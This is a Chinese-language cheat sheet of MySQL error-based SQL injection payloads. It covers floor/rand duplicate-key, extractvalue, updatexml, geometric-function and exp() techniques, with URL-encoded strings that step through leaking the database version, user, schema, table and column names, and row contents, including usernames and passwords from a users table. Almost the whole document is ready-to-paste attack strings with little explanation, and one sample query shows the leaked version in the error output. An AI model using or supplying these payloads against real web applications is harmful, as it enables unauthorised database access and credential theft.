报错注入
通过floor报错注入
固定语句公式
union select 1 from (select+count(*),concat(floor(rand(0)*2),(注入爆数据语句))a from information_schema.tables group by a)b
例子
假如id输入存在注入的话,可以通过如下语句进行报错。
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key 1
可以看到成功爆出了Mysql的版本
1、显示当前数据库名,登陆用户,数据库版本和数据路径
union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir)))a+from+information_schema.tables+group+by+a)b
获取所有的数据库名
union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(SELECT distinct concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e)+FROM+information_schema.SCHEMATA+LIMIT+0,1))a+from information_schema.tables+group+by+a)b
2、爆当前数据库中的表
union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1))a+from+information_schema.tables+group+by+a)b
3,爆字段
union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+column_name+from+information_schema.columns+where+table_name=表名+limit+0,1))a+from+information_schema.tables+group+by+a)b
4、爆内容
union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(0x3a,字段1,0x3a,字段2)+from+表名+limit+0,1))a+from+information_schema.tables+group+by+a)b
ExtractValue报错注入
测试语句
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
爆数据库版本
and extractvalue(1, concat(0x7e, (select @@version),0x7e))
1,爆数据库名
and extractvalue(1, concat(0x7e, (select user()),0x7e))
2,爆表名
and extractvalue(1, concat(0x7e, (select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1),0x7e))
3,爆字段名
and extractvalue(1, concat(0x7e, (select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x666c6167 limit 1,1),0x7e))
4,爆字段内容
and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,id,0x3a,flag,0x23) FROM flag limit 0,1)))
UpdateXml报错注入
1,爆数据库版本,用户
and updatexml(1,concat(0x7e,version(),user(),0x7e),1)
2,爆表
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e),1)
3,爆字段
and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),0x7e),1)
4,爆字段内容
and updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e,(select password from users limit 1,1),0x7e),1)
geometrycollection()报错注入
and geometrycollection((select * from(select * from(select user())a)b));
multipoint()报错注入
and multipoint((select * from(select * from(select user())a)b));
olygon()报错注入
and polygon((select * from(select * from(select user())a)b));
multipolygon()报错注入
and multipolygon((select * from(select * from(select user())a)b));
linestring()报错注入
and linestring((select * from(select * from(select user())a)b));
multilinestring()报错注入
and multilinestring((select * from(select * from(select user())a)b));
exp()报错注入
and exp(~(select * from(select user())a));